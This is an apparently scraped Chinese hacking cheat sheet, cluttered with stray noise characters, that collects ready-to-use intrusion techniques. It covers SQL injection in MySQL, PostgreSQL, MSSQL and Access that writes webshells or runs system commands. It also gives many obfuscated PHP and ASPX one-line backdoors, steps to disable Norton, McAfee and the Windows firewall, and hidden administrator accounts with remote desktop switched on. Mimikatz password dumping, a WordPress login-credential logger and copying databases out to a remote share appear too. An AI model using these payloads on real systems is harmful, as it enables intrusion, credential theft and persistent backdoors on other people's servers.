insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );% a- O+ m6 D0 v6 J8 ?! X+ Y1 d* C
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
8 h% a, Q+ J: R5 s# adrop table a;; [8 O( P4 p% }3 d* K# C
4 G) ~+ B6 C* z' _# w英文版本:9 F# U, u( y+ ~* g+ q1 U# w9 V
% d- Q' a4 s6 y- z y) Vuse test;5 I; e n' R( w9 m7 t
create table a (cmd text);
' l8 K' L; \+ Y& U! U" Einsert into a values ("set wshshell=createobject (""wscript.shell"") " );
* Q( F" A4 |0 G3 [7 s3 qinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
4 E) g! Z! U. f. \1 N( ]( Kinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );/ |0 R5 k% x/ r3 J) M( W
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs"; W) x* Y* O' @3 L1 } c3 _
drop table a;
( j% Y+ ~. V& V+ D# V4 q6 M- K8 x& a* P; n5 S" X+ R( N
create table a (cmd BLOB);
$ }1 g. Y7 z2 b+ H' F1 V r: M/ `$ winsert into a values (CONVERT(木马的16进制代码,CHAR));8 ]$ @! W6 w3 y+ f3 p$ T3 w
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
' B* H \& _5 u- zdrop table a;+ f7 _7 o2 z: \; t5 N: L
5 `% [- N9 R( N" |# M+ |
记录一下怎么处理变态诺顿
: z. X" @+ k0 j5 ?; s查看诺顿服务的路径
& q2 k) y6 p0 z+ |8 s& c# x; dsc qc ccSetMgr8 s8 ^6 b) ^' d3 B( \9 N% K9 }
然后设置权限拒绝访问。做绝一点。。
& S1 Z/ L* s h5 ^3 s' U) acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
: G1 s( G' `8 g( p5 e, a* Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
! ^; @. Z- e) S% Y) Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators/ J y( a+ P+ {# x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
( ?& U& G! a# a6 E3 h6 R6 H Z5 y5 w" S9 }
然后再重启服务器
& \( H1 `" m1 g: l( A Viisreset /reboot8 o0 N* [5 X. s* |$ D$ r
这样就搞定了。。不过完事后。记得恢复权限。。。。
- T. x w7 O" |- ?& _) W0 ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
$ M# ~& | q+ l3 P5 ~# ]cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
! ?. ]5 ^ r7 C$ h2 C$ s* E4 Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F, G3 F6 {! e* C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F1 T; q( W- V2 O! z9 [# ^9 w. [2 g
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
% Z0 A6 w' o0 w) Z: ]( ^0 q
7 J! X: e, @3 f1 K9 S( s- f* y& XEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
7 f" Z" E' A2 [8 f' C; q) h c/ v3 k
postgresql注射的一些东西* j* J$ ?9 e+ G' ?! s, s0 C# U
如何获得webshell
# L, a R5 w; d( W7 a0 qhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
' s, z+ t9 ]5 k3 phttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); / Y0 D, e$ x( U# Q$ u# d6 K/ m1 ~
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;, O" L" K) b& C1 ]3 D2 S
如何读文件$ F5 @; A; T! @! w5 T7 j4 i4 U# X0 g
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);) J6 ^) q* J5 I3 K# b
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;9 q; \% z/ w! X- E3 _; Z) G/ s+ S
http://127.0.0.1/postgresql.php?id=1;select * from myfile;8 W" D% L. V. k. ^4 X- n6 r
. e, a3 X! j' b5 X
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
6 `- y; z2 \( r& W: t当然,这些的postgresql的数据库版本必须大于8.X- T2 D1 O3 l" }9 |
创建一个system的函数: A9 i' U3 V! A" a% C! T. O2 K
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT! N: g7 l2 B: @ q1 J
! ]. e2 |" b; b5 Q, L6 h1 W2 Z创建一个输出表:
6 y8 q3 `0 z" z/ A- gCREATE TABLE stdout(id serial, system_out text); f& m( A( j2 a2 U' e, t
$ G; }3 q% }1 b ? [
执行shell,输出到输出表内:$ u$ ?( Z1 t( W. c, T' s
SELECT system('uname -a > /tmp/test')
8 e+ Y: g. [+ ~
/ \5 m0 |! n1 z2 c& w8 Jcopy 输出的内容到表里面;7 D) z3 k g/ \7 ]" x
COPY stdout(system_out) FROM '/tmp/test'& n2 q( h ^# f3 ^, E6 i7 N: P
6 [( a/ S* x2 X1 k从输出表内读取执行后的回显,判断是否执行成功0 `$ v& d8 n4 O7 v: t
# r, K( P: z$ q! Q6 G: t) lSELECT system_out FROM stdout
: h9 }- H9 v/ c" V; M- C0 @. N' e下面是测试例子
( m, I% H/ z- u- C# P0 X M) s; t) n, O8 z
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
# w, n9 i0 N: y' M, e1 Z% c1 \3 @3 v$ X6 S; z# @! C
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
# \3 X, U5 Q: y4 jSTRICT --
; I% C3 `* l9 _6 n" S5 _* i: @! b5 D$ ^& N7 H" y" U. g* @5 n
/store.php?id=1; SELECT system('uname -a > /tmp/test') --0 i1 @! [* W4 N+ Q
4 O2 l3 v" S5 ]. p/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --" X* ?: E0 {: ^" s. @% t: \
5 b* I3 _+ L/ D9 f- q$ ~/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
1 w" c) C: H- i( l- w Qnet stop sharedaccess stop the default firewall
4 K3 S) L1 y: q7 \netsh firewall show show/config default firewall
' |+ C0 z8 U; r `netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall, N* h4 U$ t9 e0 I; |
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall$ n6 U* r) L3 z/ R1 \/ j1 e. V
修改3389端口方法(修改后不易被扫出)
; n/ e7 Y: h* c( ]" s* P) \, [修改服务器端的端口设置,注册表有2个地方需要修改
# e% M0 ]! N* l7 a4 r
# ?% n- w3 ^& i6 V: a J[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
- \4 X" p: R& e. RPortNumber值,默认是3389,修改成所希望的端口,比如6000. a7 N, j1 j% {2 W
. z) X* p6 |& R& v2 o第二个地方:$ G( O4 L. E9 N; ]/ {3 w
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
- ]( h. w/ v. M3 iPortNumber值,默认是3389,修改成所希望的端口,比如6000
) H$ b6 U9 D, k# _$ N
8 w! H9 }! ]6 R0 w# U现在这样就可以了。重启系统就可以了( N& f+ |. M7 U- z$ K( O8 e
* C; d/ G4 Z$ V1 [0 k: N6 K查看3389远程登录的脚本$ f$ k0 r4 U$ x2 @# q6 Y
保存为一个bat文件8 |) T- Z+ A. d5 f: v
date /t >>D:\sec\TSlog\ts.log7 N6 t* w% ^0 Q3 E
time /t >>D:\sec\TSlog\ts.log
9 o/ E: {" r2 I s- @8 |' T% Xnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
. j& _/ a, f0 T9 M5 cstart Explorer2 m. [3 W1 h2 n* U7 a5 l7 J3 f& |
5 T4 w( @& r( x5 x: p
mstsc的参数:
- v7 H$ x5 r7 P2 u+ K# ?
- Z% P6 c# D5 ]8 d+ E7 `4 [远程桌面连接
, j1 Y) ^- ?* @
4 g. `0 w( ?: b4 `MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]0 W% g3 v: o9 Z; b- Z2 Z
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?) ^1 ?; H" B! v- R
5 Z! h. T7 i2 R6 f: b<Connection File> -- 指定连接的 .rdp 文件的名称。7 r# [- g0 ]3 E% t6 ?
. p9 _- u# L; G9 T! K/v:<server[:port]> -- 指定要连接到的终端服务器。
3 W) {( n* }3 o% a2 v% U+ M2 ]- r; Y7 A. @0 T$ G5 t0 f
/console -- 连接到服务器的控制台会话。' Z* f# e/ U7 q% |
* U% e- e. R$ P- X
/f -- 以全屏模式启动客户端。( j' q: g1 B! [. v
- h+ S3 e% s0 Y o4 Q7 [' T+ A, g9 e
/w:<width> -- 指定远程桌面屏幕的宽度。
2 b$ [. T( s: h( h8 E( b" V7 O( p* K! ]% ^
/h:<height> -- 指定远程桌面屏幕的高度。
2 m$ ~, J+ O8 ?$ t' I2 q7 {( w2 h; r' |3 l5 _$ t
/edit -- 打开指定的 .rdp 文件来编辑。' d) g1 I6 z2 O* o8 }/ Q
1 a/ ^1 O/ c; d/ L, h3 P8 W
/migrate -- 将客户端连接管理器创建的旧版" d- n3 G# x; h5 ?4 h
连接文件迁移到新的 .rdp 连接文件。
2 ]8 l" \8 Z5 C! k0 r" y8 [/ t- K# v
$ P% P, H$ c m
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
/ W/ f& U) M! N- @4 I# Emstsc /console /v:124.42.126.xxx 突破终端访问限制数量
0 b1 E( o2 @3 E3 M. w! ~2 ]' U$ I. I2 a# U& n* L( k
命令行下开启3389+ G) U- b5 B; }" i9 d3 I& n
net user asp.net aspnet /add0 W. J: h) q1 f- s2 H+ n6 Y
net localgroup Administrators asp.net /add5 W" R% C8 D, f; U) ^ t# x \& b
net localgroup "Remote Desktop Users" asp.net /add
3 o1 d0 v. f+ o$ xattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D$ a/ e& e7 r% }5 W5 v3 \0 G
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
1 p1 j8 R& o* ?, O E) g2 ]echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
8 o t2 C7 H$ p) aecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f8 D# h3 I( v. l+ u: L7 f
sc config rasman start= auto+ t1 m" g' b6 M3 |
sc config remoteaccess start= auto5 X/ R0 v6 C) Z- a$ x8 x
net start rasman+ D) q+ i/ Q, Q
net start remoteaccess" d8 b4 l5 h1 k3 f9 u) B! ^, j% m
Media: \3 k/ A+ X. a& _6 ]* j
<form id="frmUpload" enctype="multipart/form-data"
: E7 v& Z0 V, [7 Zaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>2 @2 L( c V8 D
<input type="file" name="NewFile" size="50"><br>! E* v* f- d4 N4 Y7 |
<input id="btnUpload" type="submit" value="Upload">
" E2 F" P3 v4 d h( I$ L; } S- o</form>! S! Q0 p% Y+ S) J) ~ u4 E- L
1 f% X$ Y1 q& D" j7 _0 ucontrol userpasswords2 查看用户的密码3 O3 W# w0 v: Z
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径. i+ U1 e' j |( N4 p- l v0 G
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
3 ]! l8 }$ {$ \1 S* A8 c+ @3 W) m/ B" Q4 V# v
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:7 s; o2 z' i) t
测试1:9 W1 B- r% Y' T& \: C
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t14 `# ` ~( u' A0 b; b( i
% V& D9 s! m+ O, q
测试2:( X! b. ?( c( G9 O6 f( B' A
2 Z @8 N+ `' Y- T; ]create table dirs(paths varchar(100),paths1 varchar(100), id int)
& n3 i( i8 q- N& l5 C# @' ^( p1 }9 |" s
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) ~9 V4 a/ |3 @% B4 Y8 _9 z
9 |% P0 \) P% C1 vSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
4 d% E K% a9 K3 R, p: L& d关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
2 h4 x- h. I R. l* ]可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;- d; V$ J3 V9 e% {- v4 B) K
net stop mcafeeframework$ l4 ~3 W7 |, D) }# j( \( g; i& \, a
net stop mcshield+ Z! D3 ^; _8 W F: L1 J$ a
net stop mcafeeengineservice3 X$ S& k0 k0 h: v" U' U3 ?' _3 v3 p
net stop mctaskmanager+ K4 `, S( [+ J4 d# v: B
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
4 `# V9 A/ i: O; i0 M; Q% F! a+ z+ U% R i& \: i
VNCDump.zip (4.76 KB, 下载次数: 1)
* U. w" N% z) l9 ^4 d: ~- y7 j密码在线破解http://tools88.com/safe/vnc.php
9 y! z. S. \1 @4 l) YVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取1 F2 _! O6 `2 m
# l$ x( z9 S6 ?5 ]' ~exec master..xp_cmdshell 'net user': i' Y; M5 S e" a
mssql执行命令。
; e* g) A5 ^" x; ~获取mssql的密码hash查询
+ X3 t: `6 q" i2 z7 }2 `( ~$ {select name,password from master.dbo.sysxlogins8 \0 b6 E, @1 H3 o! P
1 [# X+ h' B' P4 _* Y1 g+ zbackup log dbName with NO_LOG;2 o" e4 L5 U! e) g& V K
backup log dbName with TRUNCATE_ONLY;% S- C0 }# W" m# }! t6 v+ s% r
DBCC SHRINKDATABASE(dbName);
4 R0 P% w1 V! V1 v- L& n4 }4 Jmssql数据库压缩
O# i6 W9 t6 O: B
, ] K1 \( |& s) j2 e5 Y aRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK# j/ e) G' Y* ^0 c- @. k/ k
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
; ^' f* e3 i; x$ M' H. @ U: g
' @& d- S6 g3 t$ Y1 @0 {6 i2 jbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'0 i) Y0 a( _& F5 @, ^: o$ I
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak1 X5 H7 ]9 D; k4 |% a
/ w+ K% E5 P* S! l# ?- ^1 {3 [0 [Discuz!nt35渗透要点:: A# o5 W4 |9 c5 T' ?% m: Q
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
# x4 m! c4 m* q+ N(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
. }, a L" ~# n6 S(3)保存。
9 } B0 S. R+ }" i1 v(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass$ o5 u3 B7 R3 i+ o: X
d:\rar.exe a -r d:\1.rar d:\website\
/ Q* A. b" Z+ f- N4 @2 J递归压缩website
1 X2 L1 w% N! m; @+ W) {注意rar.exe的路径
9 Y6 o8 R' G1 j/ N# }' T% f. d4 }5 k; }
<?php
0 i+ c( T1 K3 w. [: M
/ X- e% M2 y) k- b$telok = "0${@eval($_POST[xxoo])}";
1 z& o" {. g) H
2 B0 m- Q# Y# O6 E8 z: B9 P$username = "123456";
- t f$ _* j$ t# a3 x& M" z* \. } C& L, e* W- ~" D
$userpwd = "123456";
& c4 `4 h) \$ P6 T
I0 d+ X% Z9 Y, b. @6 G+ N. d/ B$telhao = "123456";, F( Q5 C( X2 `0 E# `+ f0 P5 S
4 U0 s% f0 O T) p/ ` j! b$telinfo = "123456";$ T' ~2 r3 k; z! {+ [ C5 w
, A: ]& \, p ^6 I2 T% N% g, w4 I?>. U% n R: C3 a0 ]+ _
php一句话未过滤插入一句话木马3 }/ q" R& v" e' O
" \2 d9 j: m1 d* K) {& W
站库分离脱裤技巧
$ d* S5 R( J: a/ d* Mexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'/ R$ i+ {* A3 p8 y' |% B
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
# B4 j3 D+ h S( y( ~条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。2 [$ I* p! K% ]' q: V$ t5 Z" {
这儿利用的是马儿的专家模式(自己写代码)。
& Q B0 b1 W u5 kini_set('display_errors', 1);9 B5 T8 r$ [- l9 E+ ^
set_time_limit(0);( q. @6 D6 U7 H9 E' @9 [/ A
error_reporting(E_ALL);3 C2 e u u6 c9 D2 S
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());( F/ V6 [, c) B
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());1 ~2 B$ h! Z {- z; I) Y
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());) R x3 o" m3 a, B2 Y
$i = 0;
: F1 A) g, p# |" K9 `% H$tmp = '';
2 \5 O3 l, D5 f- R" `8 s& Vwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
4 q0 ~4 O# k8 D* M% ^1 I5 P! R# l- L $i = $i+1;6 O/ N, w7 Q, U u
$tmp .= implode("::", $row)."\n";5 ~9 C% Q6 `! l& J2 D
if(!($i%500)){//500条写入一个文件
4 z" t0 A% n; Q. E" v) }9 \$ L5 m# i $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';# d/ z8 T0 B) f; F8 T( X( K& s
file_put_contents($filename,$tmp);
/ R5 _. B5 X$ h0 M$ z $tmp = '';
5 \- f6 s% n& ~8 A. F8 O& `2 m0 J }
& a I0 F8 f% o) _* F# W}
+ w8 ]" O& }7 Tmysql_free_result($result);
' M, G' v% Q% E4 e' `& d8 m) n9 E7 I5 v4 O
& M/ D/ ~% p- S& b* |( X+ o3 J. b
& ~; a# ^) ~* Z+ c9 R! ^//down完后delete
2 Z4 ]. \0 z* M1 y# g2 `/ h6 ]' G
- n* e7 o8 e/ F& h& d0 l0 c v+ N2 K- a. g6 G' L: V
ini_set('display_errors', 1);
6 |7 b2 ~, t* Y6 ferror_reporting(E_ALL);( Y3 J! T: I1 h
$i = 0;
% Q# D" a+ ], o+ E( ~8 j; n( {, pwhile($i<32) {5 i& @8 v& H7 S7 |7 U
$i = $i+1;
) f; x5 W4 r, B2 s9 w $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';% b, o7 ]2 |/ s1 G+ f' P1 \
unlink($filename);
, ]6 S9 b2 c, ^8 }# Z} ) }1 H3 Y; h/ e" b# r: j
httprint 收集操作系统指纹
& C: o% s8 ~8 M5 u; Z扫描192.168.1.100的所有端口$ r% B ~ K$ G! z3 a
nmap –PN –sT –sV –p0-65535 192.168.1.100
% \2 {: }0 V8 q+ ^, X2 d0 r. J0 yhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
9 ?) F/ @6 u5 a0 I+ f+ \1 b7 vhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
; T& G* I1 p/ H$ H) w( h; @Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host; }& b0 a+ H2 X' H& z) k
2 ^% s5 `4 X) s) s
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
- {7 R+ Y! P6 n5 _/ a, h& N9 R& d# {4 E5 S# b! Y. e
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
W" ^6 r% C4 V/ S
# q3 Y7 L8 G: v1 d: z+ ~; N% k Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x# [0 D, W% i5 X
- s$ c; L( I4 c+ h5 O- g+ \
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)" ?3 D$ K3 n- |$ a2 n( m, L
4 b% z1 f$ J ? http://net-square.com/msnpawn/index.shtml (要求安装)
; w4 G' B3 I& Z
1 t7 |1 i) D7 X. T0 \3 b) T: D7 H tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
" R+ s; R8 L7 n
0 X8 W. {# {% u3 S! o2 w SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)1 `. @: r1 |: R/ V/ n
set names gb23124 ^! N/ K+ B. |: c5 t t
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
- |# B0 u' ]2 w. k. h% K+ |# Z7 L& f' J J# \' l `& x- _
mysql 密码修改
+ v, ^, ?! Y( l1 l) |9 x7 [UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
3 \/ o$ H& a8 h$ S% M* Supdate user set password=PASSWORD('antian365.com') where user='root';
5 V1 A9 \& C( [ x: ~. C( {$ a, \+ iflush privileges;: u, D& J& H2 B6 i
高级的PHP一句话木马后门
1 ]/ M# K9 p1 D H& W6 v/ x1 |8 I+ O7 o! z
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
E/ p" T$ J* t8 F6 m, _2 T3 Z# A/ u4 I. z
1、
3 Z2 B: m$ d5 ?1 C/ h8 X) Q) |
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";2 X% R2 H k0 O! u; c
9 }+ I: C: F% x# d9 f$hh("/[discuz]/e",$_POST['h'],"Access");
( m/ R* o1 Z$ R3 \" r; l! \4 O/ v
5 ^7 z0 R3 H4 Y `5 E6 z* D//菜刀一句话
+ L6 z' Z7 M% Q) N1 j" r4 S3 X% y, Z2 O4 O
2、, i+ t8 B: |* y) l
2 V Q% |) g; x( w6 T) b9 y1 e* N$filename=$_GET['xbid'];% S3 u; N) L- } q
/ c7 @/ Q R, L, Ninclude ($filename);
. @2 p. I3 q1 S+ A
Q, T4 T. J0 k$ z# Z5 X. i9 T//危险的include函数,直接编译任何文件为php格式运行
+ f0 T8 b* R+ a8 d* q9 J
3 ^, T( }$ S" f5 {9 p V: }3、
7 h7 g# B4 a/ m' a$ |+ _3 n% F5 l
/ `- r2 H0 Y7 L1 W$ e+ L, Q$reg="c"."o"."p"."y";
$ G' Z4 V" }* |$ J6 P, ~, D3 P& h( K6 |. o3 ?4 y
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);$ c @3 G; Z: j. B o8 q
+ D& @! C9 c; z, T//重命名任何文件
6 V6 n2 |/ N- h& v% w- t% Y4 i
9 f9 W) o2 P& E. |$ f4 X1 y4、
5 B( d7 N, |, u6 r. A* y- q4 R% i
" x' n: k. I9 D0 i7 k# j$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$ f# g7 V& `, O* @5 d$ ?
# N4 w! W% D6 f. V: c% A( K$gzid("/[discuz]/e",$_POST['h'],"Access");
9 V/ a, k- L& s- F: I0 f8 ]% Q+ O: A0 v1 |- j8 {0 w
//菜刀一句话
1 q0 b4 S6 j8 l) f) H( @# k! f6 v1 E3 }! E g' R6 Z6 V
5、include ($uid);
. A9 r8 ?7 L$ m! H7 s2 e
W$ f i/ R2 n//危险的include函数,直接编译任何文件为php格式运行,POST
% W4 _& ]' B% E# U# K& e& T& {! [; Q, e$ l9 {9 k- I- V
$ H: T) H* h4 K" ]//gif插一句话( N0 E/ m2 U w' Q- J, m
: |2 X+ _+ J/ b9 r {7 X
6、典型一句话6 q3 m+ d0 L" ?2 D, f; I3 N
7 b! |- I( A# ?" w5 T程序后门代码1 m: W- s+ V3 o) N5 R! E8 r8 z2 B
<?php eval_r($_POST[sb])?>
4 m2 g5 ]. d4 m. b程序代码
5 m0 E1 G C |6 c$ ?: p1 x<?php @eval_r($_POST[sb])?>
" b3 D& S/ F9 x. _, S9 c& X) N# Z//容错代码
0 X" S" p1 x9 f- d程序代码
4 r- x0 x# R' z3 I Q<?php assert($_POST[sb]);?>
8 m+ s1 n% u5 P- P/ N//使用lanker一句话客户端的专家模式执行相关的php语句) k' i8 l. F4 F$ j7 Q
程序代码
/ X7 a, I- u& B) I* l<?$_POST['sa']($_POST['sb']);?>
T: z& j% u3 {2 U" o7 H程序代码$ T* D m. _ ?
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
" W5 D) p0 c2 t( R+ c( A; K程序代码
4 `1 w' `, X4 }5 P3 T! |% k<?php
4 X: f) Y# `/ E. V5 k! I@preg_replace("/[email]/e",$_POST['h'],"error");
6 f: {' |$ o1 A0 M4 E. P( ^# |7 n?>3 u6 Y, a3 f: g
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入' i& q, Z% r- Z
程序代码! s" M, s7 }: F
<O>h=@eval_r($_POST[c]);</O>& P- c$ v' x/ O- v4 ^
程序代码+ {8 [9 Z4 g9 o- i
<script language="php">@eval_r($_POST[sb])</script>6 v* [( L" c! n
//绕过<?限制的一句话
" Z0 @: }: X5 M$ g7 h) x" i+ w) }/ S9 E
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip% C+ m" g- a2 A& `5 l% ?# Q4 W; w' e
详细用法:
* Q2 P* j* y! h9 Q9 `1、到tools目录。psexec \\127.0.0.1 cmd8 N& A) v, B% y w$ y5 y6 s
2、执行mimikatz2 f7 k- x+ j" C( k8 z
3、执行 privilege::debug; Z8 X5 x4 j- u. S- }
4、执行 inject::process lsass.exe sekurlsa.dll
; R1 x# ^# Q! ^! m5 V1 N5、执行@getLogonPasswords3 ~& |* k# S n+ z
6、widget就是密码2 O7 A# F2 f8 X: u- }" r
7、exit退出,不要直接关闭否则系统会崩溃。$ C- k: V6 ^* c' D/ u& u2 J
5 X9 T3 t* B/ |% V1 j7 n+ P
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
3 n& z$ F% Y( a: U/ M, v' J
, k; Z: E o- f% D( @自动查找系统高危补丁
g3 D! z! B, \$ C9 xsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt0 x4 |/ T+ k/ i3 g9 x% x9 ^
+ P/ D; H! F4 W" n& e2 g
突破安全狗的一句话aspx后门
" H2 `0 C9 s. _! Q7 \3 ~' o<%@ Page Language="C#" ValidateRequest="false" %>
' U+ o/ O% o5 t: P7 J<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
. ~5 T( K+ I. ^webshell下记录WordPress登陆密码
o8 Y( O; M' n- s- ~7 A4 T2 s- rwebshell下记录Wordpress登陆密码方便进一步社工+ O1 Q3 |. k7 a& U
在文件wp-login.php中539行处添加:
5 X/ d* e3 C7 K$ K9 j- T! j; ~// log password
! M0 H3 n$ P! P5 `4 j2 ]$log_user=$_POST['log'];
: M- Q& T1 j1 _7 c6 ?! N Z$log_pwd=$_POST['pwd'];
7 s3 t% e* ^# P1 c" O9 c9 e& P, G+ L$log_ip=$_SERVER["REMOTE_ADDR"];
. h4 \0 q T& p# \0 w' w$ O/ Y$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;( F% u) {8 J, q6 \
$txt=$txt.”\r\n”;$ p. D( l3 D, N4 I8 X F
if($log_user&&$log_pwd&&$log_ip){
! F; o& v" y4 I# k# H@fwrite(fopen(‘pwd.txt’,”a+”),$txt);) R. i0 o9 J6 U
}0 h' a* I( f5 K! L/ i3 M
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。3 X/ w1 t3 k8 o' b1 ^
就是搜索case ‘login’
" b7 F2 W* |, ^5 S在它下面直接插入即可,记录的密码生成在pwd.txt中,0 w+ ~3 m" {+ ~
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录: X0 U) p/ D- Y) n F# e
利用II6文件解析漏洞绕过安全狗代码:. z z, t! k9 F3 i, b5 B/ V
;antian365.asp;antian365.jpg
6 e ~) H) G- k; W9 A
# \6 v" l! z% c各种类型数据库抓HASH破解最高权限密码!
